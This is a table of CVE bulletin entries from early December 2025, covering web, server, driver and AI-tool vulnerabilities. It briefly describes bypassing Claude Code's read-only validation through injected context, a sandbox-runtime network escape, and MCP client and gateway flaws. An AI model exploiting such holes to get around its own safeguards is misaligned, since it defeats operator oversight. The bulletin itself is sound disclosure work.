| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/dog/{agentId} endpoint. When an authenticated user adds or edits Software Watchdog process rules for an agent, the monitored process name is stored in the settings array and later rendered in the Software Watchdog UI without proper HTML sanitation. An attacker can inject malicious script into the process name, which is then executed in the browser context of users who view or interact with the affected rules, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34264 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-dog-agentid |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/rule-engines endpoint. When an authenticated user creates or updates a rule for an agent, the rule fields min, max, and unit are stored and later rendered in rule listings or detail views without proper HTML sanitation. An attacker can inject malicious script into one or more of these fields, which is then executed in the browser context of users who view or interact with the affected rule, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34265 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-rulesengine |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/addins/menus endpoint. When an authenticated user adds or edits an AddIns menu entry, the label and path values are stored in plugin configuration data and later rendered in the AddIns UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected AddIns entry, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34266 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-addins-menus |
| AI-QL--tuui | TUUI is a desktop MCP client designed as a tool unitary utility integration. Prior to 1.3.4, a critical Remote Code Execution (RCE) vulnerability exists in Tuui due to an unsafe Cross-Site Scripting (XSS) flaw in the Markdown rendering component. Tuui allows the execution of arbitrary JavaScript within ECharts code blocks. Combined with an exposed IPC interface that allows spawning processes, an attacker can execute arbitrary system commands on the victim's machine simply by having them view a malicious Markdown message. This vulnerability is fixed in 1.3.4. | 2025-12-05 | not yet calculated | CVE-2025-66562 | https://github.com/AI-QL/tuui/security/advisories/GHSA-qjhq-rgmr-6c3g https://github.com/AI-QL/tuui/commit/f673fa5b4d76e8236c7d9506d0727875cfa79cc1 https://github.com/AI-QL/tuui/releases/tag/v1.3.4 |
| airkeyboardapp--AirKeyboard iOS App | AirKeyboard iOS App 1.0.5 contains a missing authentication vulnerability that allows unauthenticated attackers to type arbitrary keystrokes directly into the victim's iOS device in real-time without user interaction, resulting in full remote input control. | 2025-12-04 | not yet calculated | CVE-2025-66555 | Exploit Database Entry 52333 AirKeyboard Homepage Apple App Store Link https://www.vulncheck.com/advisories/airkeyboard-ios-app-105-remote-input-injection |
| AMS Development Corp.--GAMS | Vulnerability in the access control system of the GAMS licensing system that allows unlimited valid licenses to be generated, bypassing any usage restrictions. The validator uses an insecure checksum algorithm; knowing this algorithm and the format of the license lines, an attacker can recalculate the checksum and generate a valid license to grant themselves full privileges without credentials or access to the source code, allowing them unrestricted access to GAMS's mathematical models and commercial solvers. | 2025-12-02 | not yet calculated | CVE-2025-41086 | https://www.incibe.es/en/incibe-cert/notices/aviso/authorization-bypass-gams-gams-development-corp https://www.gams.com/latest/docs/RN_51.html |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 21.0.2, 20.3.15, and 19.2.17, A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain javascript: URLs) as requiring strict URL security, enabling the injection of malicious scripts. This vulnerability is fixed in 21.0.2, 20.3.15, and 19.2.17. | 2025-12-01 | not yet calculated | CVE-2025-66412 | https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49 https://github.com/angular/angular/commit/1c6b0704fb63d051fab8acff84d076abfbc4893a |
| anthropic-experimental--sandbox-runtime | Anthropic Sandbox Runtime is a lightweight sandboxing tool for enforcing filesystem and network restrictions on arbitrary processes at the OS level, without requiring a container. Prior to 0.0.16, due to a bug in sandboxing logic, sandbox-runtime did not properly enforce a network sandbox if the sandbox policy did not configure any allowed domains. This could allow sandboxed code to make network requests outside of the sandbox. A patch for this was released in v0.0.16. | 2025-12-04 | not yet calculated | CVE-2025-66479 | https://github.com/anthropic-experimental/sandbox-runtime/security/advisories/GHSA-9gqj-5w7c-vx47 https://github.com/anthropic-experimental/sandbox-runtime/commit/bea2930cc1db9c73a1b15acf6dc19c5261aec1f3 |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to 1.0.93, Due to errors in parsing shell commands related to $IFS and short CLI flags, it was possible to bypass the Claude Code read-only validation and trigger arbitrary code execution. Reliably exploiting this requires the ability to add untrusted content into a Claude Code context window. This vulnerability is fixed in 1.0.93. | 2025-12-03 | not yet calculated | CVE-2025-66032 | https://github.com/anthropics/claude-code/security/advisories/GHSA-xq4m-mc3c-vvg3 |
| Apache Software Foundation--Apache bRPC | Uncontrolled recursion in the json2pb component in Apache bRPC (version < 1.15.0) on all platforms allows remote attackers to make the server crash via sending deep recursive json data. Root Cause: The bRPC json2pb component uses rapidjson to parse json data from the network. The rapidjson parser uses a recursive parsing method by default. If the input json has a large depth of recursive structure, the parser function may run into stack overflow. Affected Scenarios: Use bRPC server with protobuf message to serve http+json requests from untrusted network. Or directly use JsonToProtoMessage to convert json from untrusted input. How to Fix: (Choose one of the following options) 1. Upgrade bRPC to version 1.15.0, which fixes this issue. 2. Apply this patch: https://github.com/apache/brpc/pull/3099 Note: No matter which option you choose, you should know that the fix introduces a recursion depth limit with default value 100. It affects these functions: ProtoMessageToJson, ProtoMessageToProtoJson, JsonToProtoMessage, and ProtoJsonToProtoMessage. If your requests contain json or protobuf messages that have a depth exceeding the limit, the request will be failed after applying the fix. You can modify the gflag json2pb_max_recursion_depth to change the limit. | 2025-12-01 | not yet calculated | CVE-2025-59789 | https://lists.apache.org/thread/ozmcsztcpxn61jxod8jo8q46jo0oc1zx |
| Apache Software Foundation--Apache HTTP Server | An integer overflow in the case of failed ACME certificate renewal leads, after a number of failures (~30 days in default configurations), to the backoff timer becoming 0. Attempts to renew the certificate then are repeated without delays until it succeeds. This issue affects Apache HTTP Server: from 2.4.30 before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-55753 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives. This issue affects Apache HTTP Server before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-58098 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows with AllowEncodedSlashes On and MergeSlashes Off allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-59775 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs. This issue affects Apache HTTP Server from 2.4.0 through 2.4.65. Users are recommended to upgrade to version 2.4.66 which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-65082 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid. This issue affects Apache HTTP Server: from 2.4.7 through 2.4.65. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-66200 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache Struts | Denial of Service vulnerability in Apache Struts, file leak in multipart request processing causes disk exhaustion. This issue affects Apache Struts: from 2.0.0 through 6.7.0, from 7.0.0 through 7.0.3. Users are recommended to upgrade to version 6.8.0 or 7.1.1, which fixes the issue. | 2025-12-01 | not yet calculated | CVE-2025-64775 | https://cwiki.apache.org/confluence/display/WW/S2-068 |
| Apache Software Foundation--Apache Tika core | Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module. | 2025-12-04 | not yet calculated | CVE-2025-66516 | https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k https://cve.org/CVERecord?id=CVE-2025-54988 |
| Arm Ltd--Valhall GPU Kernel Driver | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU processing operations to expose sensitive data.This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p4, from r50p0 through r54p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p4, from r50p0 through r54p0. | 2025-12-01 | not yet calculated | CVE-2025-2879 | https://developer.arm.com/documentation/110697/latest/ |
| Arm Ltd--Valhall GPU Kernel Driver | Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to already freed memory.This issue affects Valhall GPU Kernel Driver: from r53p0 through r54p1; Arm 5th Gen GPU Architecture Kernel Driver: from r53p0 through r54p1. | 2025-12-01 | not yet calculated | CVE-2025-6349 | https://developer.arm.com/documentation/110697/latest/ |
| Arm Ltd--Valhall GPU Kernel Driver | Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU processing operations to gain access to already freed memory.This issue affects Valhall GPU Kernel Driver: from r53p0 through r54p1; Arm 5th Gen GPU Architecture Kernel Driver: from r53p0 through r54p1. | 2025-12-01 | not yet calculated | CVE-2025-8045 | https://developer.arm.com/documentation/110697/latest/ |
| Cacti--cacti | Cacti is an open source performance and fault management framework. Prior to 1.2.29, there is an input-validation flaw in the SNMP device configuration functionality. An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations. In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process. This vulnerability is fixed in 1.2.29. | 2025-12-02 | not yet calculated | CVE-2025-66399 | https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf |
| calcom--cal.com | Cal.com is open-source scheduling software. Prior to 5.9.8, A flaw in the login credentials provider allows an attacker to bypass password verification when a TOTP code is provided, potentially gaining unauthorized access to user accounts. This issue exists due to problematic conditional logic in the authentication flow. This vulnerability is fixed in 5.9.8. | 2025-12-03 | not yet calculated | CVE-2025-66489 | https://github.com/calcom/cal.com/security/advisories/GHSA-9r3w-4j8q-pw98 |
| Canonical--python-apt | NULL pointer dereference in TagSection.keys() in python-apt on APT-based Linux systems allows a local attacker to cause a denial of service (process crash) via a crafted deb822 file with a malformed non-UTF-8 key. | 2025-12-05 | not yet calculated | CVE-2025-6966 | https://bugs.launchpad.net/ubuntu/+source/python-apt/+bug/2091865 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In ChurchCRM 6.2.0 and earlier, there is a time-based blind SQL injection in the handling of the 1FieldSec parameter. Injecting SLEEP() causes deterministic server-side delays, proving the value is incorporated into a SQL query without proper parameterization. The issue allows data exfiltration and modification via blind techniques. | 2025-12-01 | not yet calculated | CVE-2025-66313 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-47q3-c874-mqvp https://github.com/ChurchCRM/CRM/commit/719a6bc73245c40e3c30dae6229daaecd451e59f |
| Cloudflare--gokey | In gokey versions <0.2.0, a flaw in the seed decryption logic resulted in passwords incorrectly being derived solely from the initial vector and the AES-GCM authentication tag of the key seed. This issue has been fixed in gokey version 0.2.0. This is a breaking change. The fix has invalidated any passwords/secrets that were derived from the seed file (using the -s option). Even if the input seed file stays the same, version 0.2.0 gokey will generate different secrets. Impact This vulnerability impacts generated keys/secrets using a seed file as an entropy input (using the -s option). Keys/secrets generated just from the master password (without the -s option) are not impacted. The confidentiality of the seed itself is also not impacted (it is not required to regenerate the seed itself). Specific impact includes: * keys/secrets generated from a seed file may have lower entropy: it was expected that the whole seed would be used to generate keys (240 bytes of entropy input), where in vulnerable versions only 28 bytes was used * a malicious entity could have recovered all passwords, generated from a particular seed, having only the seed file in possession without the knowledge of the seed master password Patches The code logic bug has been fixed in gokey version 0.2.0 and above. Due to the deterministic nature of gokey, fixed versions will produce different passwords/secrets using seed files, as all seed entropy will be used now. System secret rotation guidance It is advised for users to regenerate passwords/secrets using the patched version of gokey (0.2.0 and above), and provision/rotate these secrets into respective systems in place of the old secret. A specific rotation procedure is system-dependent, but most common patterns are described below. Systems that do not require the old password/secret for rotation Such systems usually have a "Forgot password" facility or a similar facility allowing users to rotate their password/secrets by sending a unique "magic" link to the user's email or phone. In such cases users are advised to use this facility and input the newly generated password secret, when prompted by the system. Systems that require the old password/secret for rotation Such systems usually have a modal password rotation window usually in the user settings section requiring the user to input the old and the new password sometimes with a confirmation. To generate/recover the old password in such cases users are advised to: * temporarily download gokey version 0.1.3 https://github.com/cloudflare/gokey/releases/tag/v0.1.3 for their respective operating system to recover the old password * use gokey version 0.2.0 or above to generate the new password * populate the system provided password rotation form Systems that allow multiple credentials for the same account to be provisioned Such systems usually require a secret or a cryptographic key as a credential for access, but allow several credentials at the same time. One example is SSH: a particular user may have several authorized public keys configured on the SSH server for access. For such systems users are advised to: * generate a new secret/key/credential using gokey version 0.2.0 or above * provision the new secret/key/credential in addition to the existing credential on the system * verify that the access or required system operation is still possible with the new secret/key/credential * revoke authorization for the existing/old credential from the system Credit This vulnerability was found by Théo Cusnir ( @mister_mime https://hackerone.com/mister_mime ) and responsibly disclosed through Cloudflare's bug bounty program. | 2025-12-02 | not yet calculated | CVE-2025-13353 | https://github.com/cloudflare/gokey/security/advisories/GHSA-69jw-4jj8-fcxm |
| CollaboraOnline--online | Collabora Online - Built-in CODE Server (richdocumentscode) provides a built-in server with all of the document editing features of Collabora Online. In versions prior to 25.04.702, Collabora Online has a Configuration-Dependent RCE (OS Command Injection) in richdocumentscode proxy. Users of Nextcloud with Collabora Online - Built-in CODE Server app can be vulnerable to attack via proxy.php and an intermediate reverse proxy. This vulnerability is fixed in 25.04.702. | 2025-12-03 | not yet calculated | CVE-2025-66208 | https://github.com/CollaboraOnline/online/security/advisories/GHSA-j3q6-q5pc-v5wf |
| ColorOS--ColorOS | A flaw exists in the verification of application installation sources within ColorOS. Under specific conditions, this issue may cause the risk detection mechanism to fail, which could allow malicious applications to be installed without proper warning. | 2025-12-05 | not yet calculated | CVE-2025-27389 | https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-1996493715665068032 |
| Compass Plustechologies--TranzAxis | TranzAxis 3.2.41.10.26 allows authenticated users to inject cross-site scripting via the `Open Object in Tree` endpoint, allowing attackers to steal session cookies and potentially escalate privileges. | 2025-12-04 | not yet calculated | CVE-2025-66574 | ExploitDB-52086 Compass Technologies Homepage https://www.vulncheck.com/advisories/tranzaxis-32411026-stored-cross-site-scripting-xss |
| Data Illusion Zumbrunn--NGSurvey | Incorrect Authorization vulnerability in Data Illusion Zumbrunn NGSurvey allows any logged-in user to obtain the private information of any other user. Critical information retrieved: * APIKEY (1 year user Session) * RefreshToken (10 minutes user Session) * Password hashed with bcrypt * User IP * Email * Full Name | 2025-12-01 | not yet calculated | CVE-2025-13829 | https://docs.ngsurvey.com/installation-setup/change-log#id-3.6.17-2025-05-28 |
| djangoproject--Django | An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. `FilteredRelation` is subject to SQL injection in column aliases, using a suitably crafted dictionary, with dictionary expansion, as the `**kwargs` passed to `QuerySet.annotate()` or `QuerySet.alias()` on PostgreSQL. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Stackered for reporting this issue. | 2025-12-02 | not yet calculated | CVE-2025-13372 | Django security archive Django releases announcements Django security releases issued: 5.2.9, 5.1.15, and 4.2.27 |
| djangoproject--Django | An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. Algorithmic complexity in `django.core.serializers.xml_serializer.getInnerText()` allows a remote attacker to cause a potential denial-of-service attack triggering CPU and memory exhaustion via specially crafted XML input processed by the XML `Deserializer`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue. | 2025-12-02 | not yet calculated | CVE-2025-64460 | Django security archive Django releases announcements Django security releases issued: 5.2.9, 5.1.15, and 4.2.27 |
| docker--mcp-gateway | MCP Gateway allows easy and secure running and deployment of MCP servers. In versions 0.27.0 and earlier, when MCP Gateway runs in sse or streaming transport mode, it is vulnerable to DNS rebinding. An attacker who can get a victim to visit a malicious website or be served a malicious advertisement can perform browser-based exploitation of MCP servers executing behind the gateway, including manipulating tools or other features exposed by those MCP servers. MCP Gateway is not affected when running in the default stdio mode, which does not listen on network ports. Version 0.28.0 fixes this issue. | 2025-12-03 | not yet calculated | CVE-2025-64443 | https://github.com/docker/mcp-gateway/security/advisories/GHSA-46gc-mwh4-cc5r https://github.com/docker/mcp-gateway/commit/6b076b2479d8d1345c50c112119c62978d46858e |
| Duc--Duc | A stack buffer overflow vulnerability exists in the buffer_get function of duc, a disk management tool, where a condition can evaluate to true due to underflow, allowing an out-of-bounds read. | 2025-12-05 | not yet calculated | CVE-2025-13654 | https://github.com/zevv/duc/releases/tag/1.4.6 https://kb.cert.org/vuls/id/441887 https://hackingbydoing.wixsite.com/hackingbydoing/post/stack-buffer-overflow-in-duc |
| Eclipse Foundation--paho.mqtt.golang (Go MQTT v3.1 library) | In Eclipse Paho Go MQTT v3.1 library (paho.mqtt.golang) versions <=1.5.0 UTF-8 encoded strings, passed into the library, may be incorrectly encoded if their length exceeds 65535 bytes. This may lead to unexpected content in packets sent to the server (for example, part of an MQTT topic may leak into the message body in a PUBLISH packet). The issue arises because the length of the data passed in was converted from an int64/int32 (depending upon CPU) to an int16 without checks for overflows. The int16 length was then written, followed by the data (e.g. topic). This meant that when the data (e.g. topic) was over 65535 bytes then the amount of data written exceeds what the length field indicates. This could lead to a corrupt packet, or mean that the excess data leaks into another field (e.g. topic leaks into message body). | 2025-12-02 | not yet calculated | CVE-2025-10543 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/254 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In 5.5.1, 5.4.3, 5.3.4, 5.2.6, 5.1.6, and earlier, when AVRCP is enabled on ESP32, receiving a malformed VENDOR DEPENDENT command from a peer device can cause the Bluetooth stack to access memory before validating the command buffer length. This may lead to an out-of-bounds read, potentially exposing unintended memory content or causing unexpected behavior. | 2025-12-02 | not yet calculated | CVE-2025-66409 | https://github.com/espressif/esp-idf/security/advisories/GHSA-qhf9-vr2h-jh96 https://github.com/espressif/esp-idf/commit/075ed218cadb8088155521cd8a795d8a626519fb https://github.com/espressif/esp-idf/commit/2f788e59ee361eee230879ae2ec9cf5c893fe372 https://github.com/espressif/esp-idf/commit/798029129a71c802cff0e75eb59f902bca8f1946 https://github.com/espressif/esp-idf/commit/999710fccf95ae128fe51b5679d6b7c75c50d902 https://github.com/espressif/esp-idf/commit/d5db5f60fc1dcfdd8cd3ee898fdefaa272988ace https://github.com/espressif/esp-idf/commit/daeeba230327176b9627b1caa94acdc54065c4b7 |
| ESTsoft--ALZip | Protection Mechanism Failure vulnerability in ESTsoft ALZip on Windows allows SmartScreen bypass.This issue affects ALZip: from 12.01 before 12.29. | 2025-12-03 | not yet calculated | CVE-2025-29864 | https://altools.co.kr/product/ALZIP |
| fastify--fastify-reply-from | fastify-reply-from is a Fastify plugin to forward the current HTTP request to another server. Prior to 12.5.0, by crafting a malicious URL, an attacker could access routes that are not allowed, even though the reply.from is defined for specific routes in @fastify/reply-from. This vulnerability is fixed in 12.5.0. | 2025-12-01 | not yet calculated | CVE-2025-66415 | https://github.com/fastify/fastify-reply-from/security/advisories/GHSA-2q7r-29rg-6m5h https://github.com/fastify/fastify-reply-from/commit/4d9795cd5b57a36756d37b7f036eae369f69fa66 |
| FERMAX ELECTRNICA S.A.U--MeetMe | Insecure Storage of Sensitive Information vulnerability in MeetMe on iOS, Android allows Retrieve Embedded Sensitive Data. This issue affects MeetMe: through v2.2.5. | 2025-12-02 | not yet calculated | CVE-2025-10971 | https://www.fermax.com/security-advisories |
| Flexsense--DiskBoss | Flexsense DiskBoss 11.7.28 allows unauthenticated attackers to elevate their privileges using any of its services, enabling remote code execution during startup or reboot with escalated privileges. Attackers can exploit the unquoted service path vulnerability by specifying a malicious service name in the 'sc qc' command, allowing them to execute arbitrary system commands. | 2025-12-05 | not yet calculated | CVE-2020-36879 | Exploit Database Entry 49022 DiskBoss Homepage DiskBoss Software Link https://www.vulncheck.com/advisories/flexsense-diskboss-service-unquoted-service-path-vulnerability |
| Flexsense--DiskBoss | Flexsense DiskBoss 7.7.14 contains a local buffer overflow vulnerability in the 'Reports and Data Directory' field that allows an attacker to execute arbitrary code on the system. | 2025-12-05 | not yet calculated | CVE-2020-36880 | Exploit Database Entry 48689 Reference https://www.vulncheck.com/advisories/flexsense-diskboss-reports-and-data-directory-buffer-overflow |
| Flexsense--DiskBoss | Flexsense DiskBoss 7.7.14 contains a local buffer overflow vulnerability in the 'Input Directory' component that allows unauthenticated attackers to execute arbitrary code on the system. Attackers can exploit this by pasting a specially crafted directory path into the 'Add Input Directory' field. | 2025-12-05 | not yet calculated | CVE-2020-36881 | Exploit Database Entry 48279 Official Product Homepage Software Link Download GitHub Repository https://www.vulncheck.com/advisories/flexsense-diskboss-add-input-directory-buffer-overflow |
| Flexsense--DiskBoss | Flexsense DiskBoss 7.7.14 allows unauthenticated attackers to upload arbitrary files via /Command/Search Files/Directory field, leading to a denial of service by crashing the application. | 2025-12-05 | not yet calculated | CVE-2020-36882 | Exploit Database Entry 48276 Official Vendor Homepage Software Download Link https://www.vulncheck.com/advisories/flexsense-diskboss-denial-of-service-by-crashing-the-application |
| flipped-aurora--gin-vue-admin | Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder. | 2025-12-01 | not yet calculated | CVE-2025-66410 | https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7 https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to 2.41.0, a flaw in the server-side authorization logic allowed authenticated users to perform actions beyond their assigned roles across multiple features. Because the affected endpoints relied on client-side or UI-level checks instead of enforcing permissions on the server, users with low-privileged roles (such as students) could perform operations intended only for instructors or administrators via directly using the API's. This vulnerability is fixed in 2.41.0. | 2025-12-05 | not yet calculated | CVE-2025-66581 | https://github.com/frappe/lms/security/advisories/GHSA-2ch7-c74m-432m |
| FreePBX--security-reporting | ## Summary Authenticated SQL Injection Vulnerability in Endpoint Module Rest API | 2025-12-03 | not yet calculated | CVE-2025-62173 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-q3h9-fmpr-vpfw |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66294 | https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66297 | https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6 https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, having a simple form on site can reveal the whole Grav configuration details (including plugin configuration details) by using the correct POST payload to exploit a Server-Side Template (SST) vulnerability. Sensitive information may be contained in the configuration details. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66298 | https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, due to improper authorization checks when modifying critical fields on a POST request to /admin/pages/{page_name}, an editor with only permissions to change basic content on the form is now able to change the functioning of the form through modifying the content of the data[_json][header][form] which is the YAML frontmatter which includes the process section which dictates what happens after a user submits the form which include some important actions that could lead to further vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66301 | https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Denial of Service (DoS) vulnerability was identified in the "Languages" submenu of the Grav admin configuration panel (/admin/config/system). Specifically, the Supported parameter fails to properly validate user input. If a malformed value is inserted-such as a single forward slash (/) or an XSS test string-it causes a fatal regular expression parsing error on the server. This leads to application-wide failure due to the use of the preg_match() function with an improperly constructed regular expression, resulting in an error. Once triggered, the site becomes completely unavailable to all users. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | not yet calculated | CVE-2025-66305 | https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6 https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/config/site endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[taxonomies] parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66308 | https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Reflected Cross-Site Scripting (XSS) vulnerability was identified in the /admin/pages/[page] endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[header][content][items] parameter. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66309 | https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
